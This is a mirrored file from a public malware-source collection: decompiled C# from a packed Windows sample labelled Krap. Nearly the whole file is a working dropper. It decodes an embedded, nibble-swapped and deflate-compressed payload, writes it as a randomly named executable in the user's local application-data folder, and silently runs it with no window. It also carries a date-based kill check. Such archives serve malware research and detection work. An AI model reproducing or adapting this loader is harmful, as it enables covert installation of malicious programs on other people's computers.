mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
94 lines
3.1 KiB
C#
94 lines
3.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: Extracter.CodeClass
|
|||
|
|
// Assembly: 503A, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 21348A4C-E16E-4A81-A76B-DF145F53991F
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Packed.Win32.Krap.s-1bdb66c85295bff8bb3f40e429f7ff63ac53eb74e281b27626f4d6466ddec2bb.exe
|
|||
|
|
|
|||
|
|
using System;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.IO.Compression;
|
|||
|
|
|
|||
|
|
namespace Extracter
|
|||
|
|
{
|
|||
|
|
internal class CodeClass
|
|||
|
|
{
|
|||
|
|
static CodeClass()
|
|||
|
|
{
|
|||
|
|
if (new DateTime(2009, 7, 20).Subtract(DateTime.Now).Hours < 0)
|
|||
|
|
throw new Exception("Time elasped! xDDDD");
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static bool Extract(byte[] zipFileBuffer, string FileName, bool Run)
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
|
|||
|
|
bool flag = zipFileBuffer[0] == (byte) 1;
|
|||
|
|
MemoryStream memoryStream1 = new MemoryStream();
|
|||
|
|
memoryStream1.Write(zipFileBuffer, 1, zipFileBuffer.Length - 1);
|
|||
|
|
string str = Guid.NewGuid().ToString().Replace("-", "") + ".exe";
|
|||
|
|
if (flag)
|
|||
|
|
{
|
|||
|
|
zipFileBuffer = CodeClass.MD4((byte) 2, memoryStream1.GetBuffer());
|
|||
|
|
memoryStream1.Close();
|
|||
|
|
memoryStream1 = new MemoryStream(zipFileBuffer);
|
|||
|
|
memoryStream1.Position = 0L;
|
|||
|
|
DeflateStream deflateStream = new DeflateStream((Stream) memoryStream1, CompressionMode.Decompress);
|
|||
|
|
byte[] buffer = new byte[1024];
|
|||
|
|
MemoryStream memoryStream2 = new MemoryStream();
|
|||
|
|
int count;
|
|||
|
|
while ((count = deflateStream.Read(buffer, 0, buffer.Length)) > 0)
|
|||
|
|
memoryStream2.Write(buffer, 0, count);
|
|||
|
|
deflateStream.Close();
|
|||
|
|
zipFileBuffer = memoryStream2.GetBuffer();
|
|||
|
|
memoryStream2.Close();
|
|||
|
|
}
|
|||
|
|
else
|
|||
|
|
zipFileBuffer = CodeClass.MD4((byte) 2, memoryStream1.GetBuffer());
|
|||
|
|
memoryStream1.Close();
|
|||
|
|
FileStream fileStream = File.Create(folderPath + "\\" + str);
|
|||
|
|
fileStream.Write(zipFileBuffer, 0, zipFileBuffer.Length);
|
|||
|
|
fileStream.Close();
|
|||
|
|
if (Run)
|
|||
|
|
Process.Start(new ProcessStartInfo()
|
|||
|
|
{
|
|||
|
|
CreateNoWindow = true,
|
|||
|
|
FileName = folderPath + "\\" + str
|
|||
|
|
});
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
catch
|
|||
|
|
{
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public static byte[] MD4(byte mode, byte[] val)
|
|||
|
|
{
|
|||
|
|
switch (mode)
|
|||
|
|
{
|
|||
|
|
case 1:
|
|||
|
|
for (int index = 0; index < val.Length; ++index)
|
|||
|
|
{
|
|||
|
|
byte num1 = val[index];
|
|||
|
|
byte num2 = (byte) ((uint) num1 >> 4);
|
|||
|
|
byte num3 = (byte) ((uint) num1 << 4);
|
|||
|
|
val[index] = (byte) ((uint) num2 | (uint) num3);
|
|||
|
|
}
|
|||
|
|
break;
|
|||
|
|
case 2:
|
|||
|
|
for (int index = 0; index < val.Length; ++index)
|
|||
|
|
{
|
|||
|
|
byte num4 = val[index];
|
|||
|
|
byte num5 = (byte) ((uint) num4 << 4);
|
|||
|
|
byte num6 = (byte) ((uint) num4 >> 4);
|
|||
|
|
val[index] = (byte) ((uint) num5 | (uint) num6);
|
|||
|
|
}
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
return val;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|